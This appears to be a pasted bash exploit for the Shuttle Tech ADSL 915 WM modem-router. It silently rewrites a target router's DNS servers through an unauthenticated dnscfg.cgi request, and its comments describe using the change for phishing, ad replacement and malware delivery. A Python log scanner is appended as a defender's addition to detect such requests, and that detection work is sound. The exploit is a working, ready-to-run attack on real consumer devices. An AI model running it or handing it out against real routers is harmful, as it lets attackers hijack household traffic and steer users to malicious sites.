hackerscommunity

Shuttle Tech ADSL 915 WM - Unauth Remote DNS Change exploit

Jul 11th, 2015
#!/bin/bash
#
#        Shuttle Tech ADSL Modem-Router 915 WM
#      Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:
#  The vulnerability exists in the web interface, which is
#  accessible without authentication.
#
#  Once modified, systems use foreign DNS servers, which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#  Warning:
#  My first public report on such a serious
#  vulnerability was ignored by the manufacturers,
#  and serious criminal deeds were committed by
#  cybercriminals in Brazil. This vulnerability
#  could affect millions of users worldwide.
#  http://www.exploit-db.com/exploits/16275/
#  http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
#
#  Disclaimer:
#  This or previous programs are for educational
#  purposes ONLY. Do not use them without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (data loss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "             Shuttle Tech ADSL Modem-Router 915 WM"
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
        echo "                  http://www.ethical-hacker.org/"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
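
Seen from the defender's side, the request in the script is easy to spot in HTTP logs. The following is an added example, not part of the original paste: it scans access-log lines for calls to `dnscfg.cgi` that set `dnsPrimary`/`dnsSecondary` and reports resolvers outside an approved list. The Common Log Format input, the sample lines and the `APPROVED_RESOLVERS` values are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: resolvers the network owner has approved (constructed values).
APPROVED_RESOLVERS = {"192.0.2.53", "192.0.2.54"}

# Common Log Format: client address first, request line in double quotes.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation address ranges only).
SAMPLE_LOG = [
    '203.0.113.9 - - [11/Jul/2015:10:00:01 +0000] "GET /dnscfg.cgi?dnsPrimary=198.51.100.66'
    '&dnsSecondary=198.51.100.67&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [11/Jul/2015:10:02:17 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.10 - - [11/Jul/2015:10:05:40 +0000] "GET /dnscfg.cgi?dnsPrimary=192.0.2.53'
    '&dnsSecondary=&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 512',
]


def find_dns_change_requests(lines, approved=APPROVED_RESOLVERS):
    """Return one finding per logged request to dnscfg.cgi that sets DNS servers."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.lower().endswith("/dnscfg.cgi"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        # An empty dnsSecondary is legal (the two-argument form sends one).
        servers = [params[k][0] for k in ("dnsPrimary", "dnsSecondary")
                   if params.get(k) and params[k][0]]
        if not servers:
            continue
        findings.append({
            "source": match.group("src"),
            "servers": servers,
            "unapproved": [s for s in servers if s not in approved],
        })
    return findings


if __name__ == "__main__":
    for f in find_dns_change_requests(SAMPLE_LOG):
        status = "ALERT" if f["unapproved"] else "review"
        print(f'{status}: {f["source"]} set DNS to {", ".join(f["servers"])}')
```

Because the interface accepts the request without authentication, every hit deserves review even when the resolvers are approved; the `unapproved` list only ranks which ones to look at first.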